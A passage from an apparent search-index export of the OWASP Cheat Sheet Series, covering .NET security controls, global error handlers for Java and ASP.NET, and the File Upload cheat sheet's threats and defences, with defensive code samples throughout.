protected\u00a0void\u00a0Application_BeginRequest()\n{\n#if\u00a0!DEBUG\n//\u00a0SECURE:\u00a0Ensure\u00a0any\u00a0request\u00a0is\u00a0returned\u00a0over\u00a0SSL/TLS\u00a0in\u00a0production\nif\u00a0(!Request.IsLocal\u00a0&&\u00a0!Context.Request.IsSecureConnection)\u00a0{\nvar\u00a0redirect\u00a0=\u00a0Context.Request.Url.ToString()\n.ToLower(CultureInfo.CurrentCulture)\n.Replace(\"http:\",\u00a0\"https:\");\nResponse.Redirect(redirect);\n}\n#endif\n}\n

e.g Startup.cs in the Configure()

  app.UseHttpsRedirection();\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery","title":"Cross-site request forgery","text":"

DO NOT: Send sensitive data without validating Anti-Forgery-Tokens (.NET / .NET Core).

DO: Send the anti-forgery token with every POST/PUT request:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-framework","title":"Using .NET Framework","text":"
using (Html.BeginForm(\"LogOff\", \"Account\", FormMethod.Post, new { id = \"logoutForm\",\n@class = \"pull-right\" }))\n{\n@Html.AntiForgeryToken()\n<ul class=\"nav nav-pills\">\n<li role=\"presentation\">\nLogged on as @User.Identity.Name\n</li>\n<li role=\"presentation\">\n<a href=\"javascript:document.getElementById('logoutForm').submit()\">Log off</a>\n</li>\n</ul>\n}\n

Then validate it at the method or preferably the controller level:

[HttpPost]\n[ValidateAntiForgeryToken]\npublic\u00a0ActionResult\u00a0LogOff()\n

Make sure the tokens are removed completely for invalidation on logout.

///\u00a0<summary>\n///\u00a0SECURE:\u00a0Remove\u00a0any\u00a0remaining\u00a0cookies\u00a0including\u00a0Anti-CSRF\u00a0cookie\n///\u00a0</summary>\npublic\u00a0void\u00a0RemoveAntiForgeryCookie(Controller\u00a0controller)\n{\nstring[]\u00a0allCookies\u00a0=\u00a0controller.Request.Cookies.AllKeys;\nforeach\u00a0(string\u00a0cookie\u00a0in\u00a0allCookies)\n{\nif\u00a0(controller.Response.Cookies[cookie]\u00a0!=\u00a0null\u00a0&&\ncookie\u00a0==\u00a0\"__RequestVerificationToken\")\n{\ncontroller.Response.Cookies[cookie].Expires\u00a0=\u00a0DateTime.Now.AddDays(-1);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-later","title":"Using .NET Core 2.0 or later","text":"

Starting with .NET Core 2.0 it is possible to automatically generate and verify the antiforgery token.

If you are using tag-helpers, which is the default for most web project templates, then all forms will automatically send the anti-forgery token. You can check if tag-helpers are enabled by checking if your main _ViewImports.cshtml file contains:

@addTagHelper *, Microsoft.AspNetCore.Mvc.TagHelpers\n

IHtmlHelper.BeginForm also sends anti-forgery-tokens automatically.

Unless you are using tag-helpers or IHtmlHelper.BeginForm, you must use the requisite helper on forms as seen here:

<form action=\"RelevantAction\" >\n@Html.AntiForgeryToken()\n</form>\n

To automatically validate all requests other than GET, HEAD, OPTIONS and TRACE you need to add a global action filter with the AutoValidateAntiforgeryToken attribute inside your Startup.cs as mentioned in the following article:

services.AddMvc(options =>\n{\noptions.Filters.Add(new AutoValidateAntiforgeryTokenAttribute());\n});\n

If you need to disable the attribute validation for a specific method on a controller you can add the IgnoreAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[IgnoreAntiforgeryToken]\n[HttpDelete]\npublic IActionResult Delete()\n
[IgnoreAntiforgeryToken]\npublic class UnsafeModel : PageModel\n

If you need to also validate the token on GET, HEAD, OPTIONS or TRACE - requests you can add the ValidateAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[HttpGet]\n[ValidateAntiforgeryToken]\npublic IActionResult DoSomethingDangerous()\n
[HttpGet]\n[ValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n

In case you can't use a global action filter, add the AutoValidateAntiforgeryToken attribute to your controller classes or razor page models:

[AutoValidateAntiforgeryToken]\npublic class UserController\n
[AutoValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-net-framework-with-ajax","title":"Using .Net Core 2.0 or .NET Framework with AJAX","text":"

You will need to attach the anti-forgery token to AJAX requests.

If you are using jQuery in an ASP.NET Core MVC view this can be achieved using this snippet:

@inject  Microsoft.AspNetCore.Antiforgery.IAntiforgery antiforgeryProvider\n$.ajax(\n{\ntype: \"POST\",\nurl: '@Url.Action(\"Action\", \"Controller\")',\ncontentType: \"application/x-www-form-urlencoded; charset=utf-8\",\ndata: {\nid: id,\n'__RequestVerificationToken': '@antiforgeryProvider.GetAndStoreTokens(this.Context).RequestToken'\n}\n})\n

If you are using the .NET Framework, you can find some code snippets here.

More information can be found here for Cross-Site Request Forgery.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a7-cross-site-scripting-xss","title":"A7 Cross-Site Scripting (XSS)","text":"

DO NOT: Trust any data the user sends you, prefer allow lists (always safe) over block lists

You get encoding of all HTML content with MVC3, to properly encode all content whether HTML, javascript, CSS, LDAP etc use the Microsoft AntiXSS library:

Install-Package\u00a0AntiXSS

Then set in config:

<system.web>\n<httpRuntime targetFramework=\"4.5\"\nenableVersionHeader=\"false\"\nencoderType=\"Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary\"\nmaxRequestLength=\"4096\" />\n

DO NOT: Use the [AllowHTML] attribute or helper class @Html.Raw unless you really know that the content you are writing to the browser is safe and has been escaped properly.

DO: Enable a Content Security Policy, this will prevent your pages from accessing assets it should not be able to access (e.g. a malicious script):

<system.webServer>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self';\n                font-src 'self'; script-src 'self'\" />\n

More information can be found here for Cross-Site Scripting.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a8-insecure-deserialization","title":"A8 Insecure Deserialization","text":"

Information about Insecure Deserialization can be found on this cheat sheet.

DO NOT: Accept Serialized Objects from Untrusted Sources

DO: Validate User Input Malicious users are able to use objects like cookies to insert malicious information to change user roles. In some cases, hackers are able to elevate their privileges to administrator rights by using a pre-existing or cached password hash from a previous session.

DO: Prevent Deserialization of Domain Objects

DO: Run the Deserialization Code with Limited Access Permissions If a deserialized hostile object tries to initiate a system processes or access a resource within the server or the host's OS, it will be denied access and a permission flag will be raised so that a system administrator is made aware of any anomalous activity on the server.

More information can be found here: Deserialization Cheat Sheet

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a9-using-components-with-known-vulnerabilities","title":"A9 Using Components with Known Vulnerabilities","text":"

DO: Keep the .Net framework updated with the latest patches

DO: Keep your NuGet packages up to date, many will contain their own vulnerabilities.

DO: Run the OWASP Dependency Checker against your application as part of your build process and act on any high level vulnerabilities.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-insufficient-logging-monitoring","title":"A10 Insufficient Logging & Monitoring","text":"

DO: Ensure all login, access control failures and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as: csharp Log.Error(\"Error was thrown\"); rather log the stack trace, error message and user ID who caused the error.

DO NOT: Log sensitive data such as user's passwords.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

What Logs to Collect and more information about Logging can be found on this cheat sheet.

.NET Core come with a LoggerFactory, which is in Microsoft.Extensions.Logging. More information about ILogger can be found here.

How to log all errors from the Startup.cs, so that anytime an error is thrown it will be logged.

public void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\nif (env.IsDevelopment())\n{\n_isDevelopment = true;\napp.UseDeveloperExceptionPage();\n}\n\n//Log all errors in the application\napp.UseExceptionHandler(errorApp =>\n{\nerrorApp.Run(async context =>\n{\nvar errorFeature = context.Features.Get<IExceptionHandlerFeature>();\nvar exception = errorFeature.Error;\n\nLog.Error(String.Format(\"Stacktrace of error: {0}\",exception.StackTrace.ToString()));\n});\n});\n\napp.UseAuthentication();\napp.UseMvc();\n}\n}\n

e.g Injecting into the class constructor, which makes writing unit test simpler. It is recommended if instances of the class will be created using dependency injection (e.g. MVC controllers). The below example shows logging of all unsuccessful log in attempts.

public class AccountsController : Controller\n{\nprivate ILogger _Logger;\n\npublic AccountsController( ILogger logger)\n{\n_Logger = logger;\n}\n\n[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\npublic async Task<IActionResult> Login(LoginViewModel model)\n{\nif (ModelState.IsValid)\n{\nvar result = await _signInManager.PasswordSignInAsync(model.Email, model.Password, model.RememberMe, lockoutOnFailure: false);\nif (result.Succeeded)\n{\n//Log all successful log in attempts\nLog.Information(String.Format(\"User: {0}, Successfully Logged in\", model.Email));\n//Code for successful login\n}\nelse\n{\n//Log all incorrect log in attempts\nLog.Information(String.Format(\"User: {0}, Incorrect Password\", model.Email));\n}\n}\n...\n}\n

Logging levels for ILogger are listed below, in order of high to low importance:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

Monitoring allow us to validate the performance and health of a running system through key performance indicators.

In .NET a great option to add monitoring capabilities is Application Insights.

More information about Logging and Monitoring can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#owasp-2013","title":"OWASP 2013","text":"

Below is vulnerability not discussed in OWASP 2017

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a10-unvalidated-redirects-and-forwards","title":"A10 Unvalidated redirects and forwards","text":"

A protection against this was introduced in Mvc 3 template. Here is the code:

public\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n{\nif\u00a0(ModelState.IsValid)\n{\nvar\u00a0logonResult\u00a0=\u00a0await\u00a0_userManager.TryLogOnAsync(model.UserName,\u00a0model.Password);\nif\u00a0(logonResult.Success)\n{\nawait\u00a0_userManager.LogOnAsync(logonResult.UserName,\u00a0model.RememberMe);\u00a0\u00a0return\u00a0RedirectToLocal(returnUrl);\n...\n
private\u00a0ActionResult\u00a0RedirectToLocal(string\u00a0returnUrl)\n{\nif\u00a0(Url.IsLocalUrl(returnUrl))\n{\nreturn\u00a0Redirect(returnUrl);\n}\nelse\n{\nreturn\u00a0RedirectToAction(\"Landing\",\u00a0\"Account\");\n}\n}\n

Other advice:

More information:

For more information on all of the above and code samples incorporated into a sample MVC5 application with an enhanced security baseline go to Security Essentials Baseline project

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#xaml-guidance","title":"XAML Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#windows-forms-guidance","title":"Windows Forms Guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#wcf-guidance","title":"WCF Guidance","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html","title":"Error Handling Cheat Sheet","text":""},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Error handling is a part of the overall security of an application. Except in movies, an attack always begins with a Reconnaissance phase in which the attacker will try to gather as much technical information (often name and version properties) as possible about the target, such as the application server, frameworks, libraries, etc.

Unhandled errors can assist an attacker in this initial phase, which is very important for the rest of the attack.

The following link provides a description of the different phases of an attack.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#context","title":"Context","text":"

Issues at the error handling level can reveal a lot of information about the target and can also be used to identify injection points in the target's features.

Below is an example of the disclosure of a technology stack, here the Struts2 and Tomcat versions, via an exception rendered to the user:

HTTP Status 500 - For input string: \"null\"\n\ntype Exception report\n\nmessage For input string: \"null\"\n\ndescription The server encountered an internal error that prevented it from fulfilling this request.\n\nexception\n\njava.lang.NumberFormatException: For input string: \"null\"\n    java.lang.NumberFormatException.forInputString(NumberFormatException.java:65)\n    java.lang.Integer.parseInt(Integer.java:492)\n    java.lang.Integer.parseInt(Integer.java:527)\n    sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n    sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)\n    sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n    java.lang.reflect.Method.invoke(Method.java:606)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:450)\n    com.opensymphony.xwork2.DefaultActionInvocation.invokeActionOnly(DefaultActionInvocation.java:289)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:252)\n    org.apache.struts2.interceptor.debugging.DebuggingInterceptor.intercept(DebuggingInterceptor.java:256)\n    com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:246)\n    ...\n\nnote: The full stack trace of the root cause is available in the Apache Tomcat/7.0.56 logs.\n

Below is an example of disclosure of a SQL query error, along with the site installation path, that can be used to identify an injection point:

Warning: odbc_fetch_array() expects parameter /1 to be resource, boolean given\nin D:\\app\\index_new.php on line 188\n

The OWASP Testing Guide provides different techniques to obtain technical information from an application.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#objective","title":"Objective","text":"

The article shows how to configure a global error handler as part of your application's runtime configuration. In some cases, it may be more efficient to define this error handler as part of your code. The outcome being that when an unexpected error occurs then a generic response is returned by the application but the error details are logged server side for investigation, and not returned to the user.

The following schema shows the target approach:

As most recent application topologies are API based, we assume in this article that the backend exposes only a REST API and does not contain any user interface content. The application should try and exhaustively cover all possible failure modes and use 5xx errors only to indicate responses to requests that it cannot fulfill, but not provide any content as part of the response that would reveal implementation details. For that, RFC 7807 - Problem Details for HTTP APIs defines a document format. For the error logging operation itself, the logging cheat sheet should be used. This article focuses on the error handling part.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#proposition","title":"Proposition","text":"

For each technology stack, the following configuration options are proposed:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#standard-java-web-application","title":"Standard Java Web Application","text":"

For this kind of application, a global error handler can be configured at the web.xml deployment descriptor level.

We propose here a configuration that can be used from Servlet specification version 2.5 and above.

With this configuration, any unexpected error will cause a redirection to the page error.jsp in which the error will be traced and a generic response will be returned.

Configuration of the redirection into the web.xml file:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<web-app xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" ns=\"http://java.sun.com/xml/ns/javaee\"\nxsi:schemaLocation=\"http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_3_0.xsd\"\nversion=\"3.0\">\n...\n    <error-page>\n<exception-type>java.lang.Exception</exception-type>\n<location>/error.jsp</location>\n</error-page>\n...\n</web-app>\n

Content of the error.jsp file:

<%@ page language=\"java\" isErrorPage=\"true\" contentType=\"application/json; charset=UTF-8\"\npageEncoding=\"UTF-8\"%>\n<%\nString errorMessage = exception.getMessage();\n//Log the exception via the content of the implicit variable named \"exception\"\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response is an error\nresponse.setHeader(\"X-ERROR\", \"true\");\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, when we have misbehaving clients\nresponse.setStatus(500);\n%>\n{\"message\":\"An error occur, please retry\"}\n
"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#java-springmvcspringboot-web-application","title":"Java SpringMVC/SpringBoot web application","text":"

With SpringMVC or SpringBoot, you can define a global error handler by implementing the following class in your project. Spring Framework 6 introduced the problem details based on RFC 7807.

We indicate to the handler, via the annotation @ExceptionHandler, to act when any exception extending the class java.lang.Exception is thrown by the application. We also use the ProblemDetail class to create the response object.

import org.springframework.http.HttpStatus;\nimport org.springframework.http.ProblemDetail;\nimport org.springframework.web.bind.annotation.ExceptionHandler;\nimport org.springframework.web.bind.annotation.RestControllerAdvice;\nimport org.springframework.web.context.request.WebRequest;\nimport org.springframework.web.servlet.mvc.method.annotation.ResponseEntityExceptionHandler;\n\n/**\n * Global error handler in charge of returning a generic response in case of unexpected error situation.\n */\n@RestControllerAdvice\npublic class RestResponseEntityExceptionHandler extends ResponseEntityExceptionHandler {\n\n@ExceptionHandler(value = {Exception.class})\npublic ProblemDetail handleGlobalError(RuntimeException exception, WebRequest request) {\n//Log the exception via the content of the parameter named \"exception\"\n//...\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\n//By specification, the content-type can be \"application/problem+json\" or \"application/problem+xml\"\nreturn ProblemDetail.forStatusAndDetail(HttpStatus.INTERNAL_SERVER_ERROR, \"An error occur, please retry\");\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-core-web-application","title":"ASP NET Core web application","text":"

With ASP.NET Core, you can define a global error handler by indicating that the exception handler is a dedicated API Controller.

Content of the API Controller dedicated to the error handling:

using Microsoft.AspNetCore.Authorization;\nusing Microsoft.AspNetCore.Diagnostics;\nusing Microsoft.AspNetCore.Mvc;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\n\nnamespace MyProject.Controllers\n{\n/// <summary>\n/// API Controller used to intercept and handle all unexpected exception\n/// </summary>\n[Route(\"api/[controller]\")]\n[ApiController]\n[AllowAnonymous]\npublic class ErrorController : ControllerBase\n{\n/// <summary>\n/// Action that will be invoked for any call to this Controller in order to handle the current error\n/// </summary>\n/// <returns>A generic error formatted as JSON because we are in a REST API app context</returns>\n[HttpGet]\n[HttpPost]\n[HttpHead]\n[HttpDelete]\n[HttpPut]\n[HttpOptions]\n[HttpPatch]\npublic JsonResult Handle()\n{\n//Get the exception that has implied the call to this controller\nException exception = HttpContext.Features.Get<IExceptionHandlerFeature>()?.Error;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occur, please retry\"\n} };\nJsonResult response = new JsonResult(responseBody);\n//Note that we're using an internal server error response\n//In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients\nresponse.StatusCode = (int)HttpStatusCode.InternalServerError;\nRequest.HttpContext.Response.Headers.Remove(\"X-ERROR\");\nRequest.HttpContext.Response.Headers.Add(\"X-ERROR\", \"true\");\nreturn response;\n}\n}\n}\n

Definition in the application Startup.cs file of the mapping of the exception handler to the dedicated error handling API controller:

using Microsoft.AspNetCore.Builder;\nusing Microsoft.AspNetCore.Hosting;\nusing Microsoft.AspNetCore.Mvc;\nusing Microsoft.Extensions.Configuration;\nusing Microsoft.Extensions.DependencyInjection;\n\nnamespace MyProject\n{\npublic class Startup\n{\n...\npublic void Configure(IApplicationBuilder app, IHostingEnvironment env)\n{\n//First we configure the error handler middleware!\n//We enable the global error handler in others environments than DEV\n//because debug page are useful during implementation\nif (env.IsDevelopment())\n{\napp.UseDeveloperExceptionPage();\n}\nelse\n{\n//Our global handler is defined on \"/api/error\" URL so we indicate to the\n//exception handler to call this API controller\n//on any unexpected exception raised by the application\napp.UseExceptionHandler(\"/api/error\");\n\n//To customize the response content type and text, use the overload of\n//UseStatusCodePages that takes a content type and format string.\napp.UseStatusCodePages(\"text/plain\", \"Status code page, status code: {0}\");\n}\n\n//We configure others middlewares, remember that the declaration order is important...\napp.UseMvc();\n//...\n}\n}\n}\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#asp-net-web-api-web-application","title":"ASP NET Web API web application","text":"

With ASP.NET Web API (from the standard .NET framework and not from the .NET Core framework), you can define and register handlers in order to trace and handle any error that occurs in the application.

Definition of the handler for the tracing of the error details:

using System;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global logger used to trace any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorLogger : ExceptionLogger\n{\n/// <summary>\n/// Method in charge of the management of the error from a tracing point of view\n/// </summary>\n/// <param name=\"context\">Context containing the error details</param>\npublic override void Log(ExceptionLoggerContext context)\n{\n//Get the exception\nException exception = context.Exception;\n//Log the exception via the content of the variable named \"exception\" if it is not NULL\n//...\n}\n}\n}\n

Definition of the handler for the management of the error in order to return a generic response:

using Newtonsoft.Json;\nusing System;\nusing System.Collections.Generic;\nusing System.Net;\nusing System.Net.Http;\nusing System.Text;\nusing System.Threading;\nusing System.Threading.Tasks;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject.Security\n{\n/// <summary>\n/// Global handler used to handle any error that occurs at application wide level\n/// </summary>\npublic class GlobalErrorHandler : ExceptionHandler\n{\n/// <summary>\n/// Method in charge of handle the generic response send in case of error\n/// </summary>\n/// <param name=\"context\">Error context</param>\npublic override void Handle(ExceptionHandlerContext context)\n{\ncontext.Result = new GenericResult();\n}\n\n/// <summary>\n/// Class used to represent the generic response send\n/// </summary>\nprivate class GenericResult : IHttpActionResult\n{\n/// <summary>\n/// Method in charge of creating the generic response\n/// </summary>\n/// <param name=\"cancellationToken\">Object to cancel the task</param>\n/// <returns>A task in charge of sending the generic response</returns>\npublic Task<HttpResponseMessage> ExecuteAsync(CancellationToken cancellationToken)\n{\n//We build a generic response with a JSON format because we are in a REST API app context\n//We also add an HTTP response header to indicate to the client app that the response\n//is an error\nvar responseBody = new Dictionary<String, String>{ {\n\"message\", \"An error occur, please retry\"\n} };\n// Note that we're using an internal server error response\n// In some cases it may be prudent to return 4xx error codes, if we have misbehaving clients \nHttpResponseMessage response = new HttpResponseMessage(HttpStatusCode.InternalServerError);\nresponse.Headers.Add(\"X-ERROR\", \"true\");\nresponse.Content = new StringContent(JsonConvert.SerializeObject(responseBody),\nEncoding.UTF8, \"application/json\");\nreturn Task.FromResult(response);\n}\n}\n}\n}\n

Registration of the both handlers in the application WebApiConfig.cs file:

using MyProject.Security;\nusing System.Web.Http;\nusing System.Web.Http.ExceptionHandling;\n\nnamespace MyProject\n{\npublic static class WebApiConfig\n{\npublic static void Register(HttpConfiguration config)\n{\n//Register global error logging and handling handlers in first\nconfig.Services.Replace(typeof(IExceptionLogger), new GlobalErrorLogger());\nconfig.Services.Replace(typeof(IExceptionHandler), new GlobalErrorHandler());\n//Rest of the configuration\n//...\n}\n}\n}\n

Setting customErrors section to the Web.config file within the csharp <system.web> node as follows.

<configuration>\n...\n<system.web>\n<customErrors mode=\"RemoteOnly\"\ndefaultRedirect=\"~/ErrorPages/Oops.aspx\" />\n...\n</system.web>\n</configuration>\n

References:

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

The source code of all the sandbox projects created to find the right setup to use is stored in this GitHub repository.

"},{"location":"cheatsheets/Error_Handling_Cheat_Sheet.html#appendix-http-errors","title":"Appendix HTTP Errors","text":"

A reference for HTTP errors can be found here RFC 2616. Using error messages that do not provide implementation details is important to avoid information leakage. In general, consider using 4xx error codes for requests that are due to an error on the part of the HTTP client (e.g. unauthorized access, request body too large) and use 5xx to indicate errors that are triggered on server side, due to an unforeseen bug. Ensure that applications are monitored for 5xx errors which are a good indication of the application failing for some sets of inputs.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html","title":"File Upload Cheat Sheet","text":""},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#introduction","title":"Introduction","text":"

File upload is becoming a more and more essential part of any application, where the user is able to upload their photo, their CV, or a video showcasing a project they are working on. The application should be able to fend off bogus and malicious files in a way to keep the application and the users safe.

In short, the following principles should be followed to reach a secure file upload implementation:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-threats","title":"File Upload Threats","text":"

In order to assess and know exactly what controls to implement, knowing what you're facing is essential to protect your assets. The following sections will hopefully showcase the risks accompanying the file upload functionality.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#malicious-files","title":"Malicious Files","text":"

The attacker delivers a file for malicious intent, such as:

  1. Exploit vulnerabilities in the file parser or processing module (e.g. ImageTrick Exploit, XXE)
  2. Use the file for phishing (e.g. careers form)
  3. Send ZIP bombs, XML bombs (otherwise known as billion laughs attack), or simply huge files in a way to fill the server storage which hinders and damages the server's availability
  4. Overwrite an existing file on the system
  5. Client-side active content (XSS, CSRF, etc.) that could endanger other users if the files are publicly retrievable.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#public-file-retrieval","title":"Public File Retrieval","text":"

If the file uploaded is publicly retrievable, additional threats can be addressed:

  1. Public disclosure of other files
  2. Initiate a DoS attack by requesting lots of files. Requests are small, yet responses are much larger
  3. File content that could be deemed as illegal, offensive, or dangerous (e.g. personal data, copyrighted data, etc.) which will make you a host for such malicious files.
"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-upload-protection","title":"File Upload Protection","text":"

There is no silver bullet in validating user content. Implementing a defense in depth approach is key to make the upload process harder and more locked down to the needs and requirements for the service. Implementing multiple techniques is key and recommended, as no one technique is enough to secure the service.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#extension-validation","title":"Extension Validation","text":"

Ensure that the validation occurs after decoding the file name, and that a proper filter is set in place in order to avoid certain known bypasses, such as the following:

Refer to the Input Validation CS to properly parse and process the extension.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#list-allowed-extensions","title":"List Allowed Extensions","text":"

Ensure the usage of business-critical extensions only, without allowing any type of non-required extensions. For example if the system requires:

Based on the needs of the application, ensure the least harmful and the lowest risk file types to be used.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#block-extensions","title":"Block Extensions","text":"

Identify potentially harmful file types and block extensions that you regard harmful to your service.

Please be aware that blocking specific extensions is a weak protection method on its own. The Unrestricted File Upload vulnerability article describes how attackers may attempt to bypass such a check.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#content-type-validation","title":"Content-Type Validation","text":"

The Content-Type for uploaded files is provided by the user, and as such cannot be trusted, as it is trivial to spoof. Although it should not be relied upon for security, it provides a quick check to prevent users from unintentionally uploading files with the incorrect type.

Other than defining the extension of the uploaded file, its MIME-type can be checked for a quick protection against simple file upload attacks.

This can be done preferably in an allow list approach; otherwise, this can be done in a block list approach.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-signature-validation","title":"File Signature Validation","text":"

In conjunction with content-type validation, validating the file's signature can be checked and verified against the expected file that should be received.

This should not be used on its own, as bypassing it is pretty common and easy.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filename-sanitization","title":"Filename Sanitization","text":"

Filenames can endanger the system in multiple ways, either by using non acceptable characters, or by using special and restricted filenames. For Windows, refer to the following MSDN guide. For a wider overview on different filesystems and how they treat files, refer to Wikipedia's Filename page.

In order to avoid the above mentioned threat, creating a random string as a file-name, such as generating a UUID/GUID, is essential. If the filename is required by the business needs, proper input validation should be done for client-side (e.g. active content that results in XSS and CSRF attacks) and back-end side (e.g. special files overwrite or creation) attack vectors. Filename length limits should be taken into consideration based on the system storing the files, as each system has its own filename length limit. If user filenames are required, consider implementing the following:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-content-validation","title":"File Content Validation","text":"

As mentioned in the Public File Retrieval section, file content can contain malicious, inappropriate, or illegal data.

Based on the expected type, special file content validation can be applied:

The File Upload service should allow users to report illegal content, and copyright owners to report abuse.

If there are enough resources, manual file review should be conducted in a sandboxed environment before releasing the files to the public.

Adding some automation to the review could be helpful, which is a harsh process and should be well studied before its usage. Some services (e.g. Virus Total) provide APIs to scan files against well known malicious file hashes. Some frameworks can check and validate the raw content type and validating it against predefined file types, such as in ASP.NET Drawing Library. Beware of data leakage threats and information gathering by public services.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#file-storage-location","title":"File Storage Location","text":"

The location where the files should be stored must be chosen based on security and business requirements. The following points are set by security priority, and are inclusive:

  1. Store the files on a different host, which allows for complete segregation of duties between the application serving the user, and the host handling file uploads and their storage.
  2. Store the files outside the webroot, where only administrative access is allowed.
  3. Store the files inside the webroot, and set them in write permissions only.
  4. If read access is required, setting proper controls is a must (e.g. internal IP, authorized user, etc.)

Storing files in a studied manner in databases is one additional technique. This is sometimes used for automatic backup processes, non file-system attacks, and permissions issues. In return, this opens up the door to performance issues (in some cases), storage considerations for the database and its backups, and this opens up the door to SQLi attack. This is advised only when a DBA is on the team and that this process shows to be an improvement on storing them on the file-system.

Some files are emailed or processed once they are uploaded, and are not stored on the server. It is essential to conduct the security measures discussed in this sheet before doing any actions on them.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#user-permissions","title":"User Permissions","text":"

Before any file upload service is accessed, proper validation should occur on two levels for the user uploading a file:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#filesystem-permissions","title":"Filesystem Permissions","text":"

Set the files permissions on the principle of least privilege.

Files should be stored in a way that ensures:

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#upload-and-download-limits","title":"Upload and Download Limits","text":"

The application should set proper size limits for the upload service in order to protect the file storage capacity. If the system is going to extract the files or process them, the file size limit should be considered after file decompression is conducted and by using secure methods to calculate zip files size. For more on this, see how to Safely extract files from ZipInputStream, Java's input stream to handle ZIP files.

The application should set proper request limits as well for the download service if available to protect the server from DoS attacks.

"},{"location":"cheatsheets/File_Upload_Cheat_Sheet.html#java-code-snippets","title":"Java Code Snippets","text":"

Document Upload Protection repository written by Dominique for certain document types in Java.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html","title":"Forgot Password Cheat Sheet","text":""},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#introduction","title":"Introduction","text":"

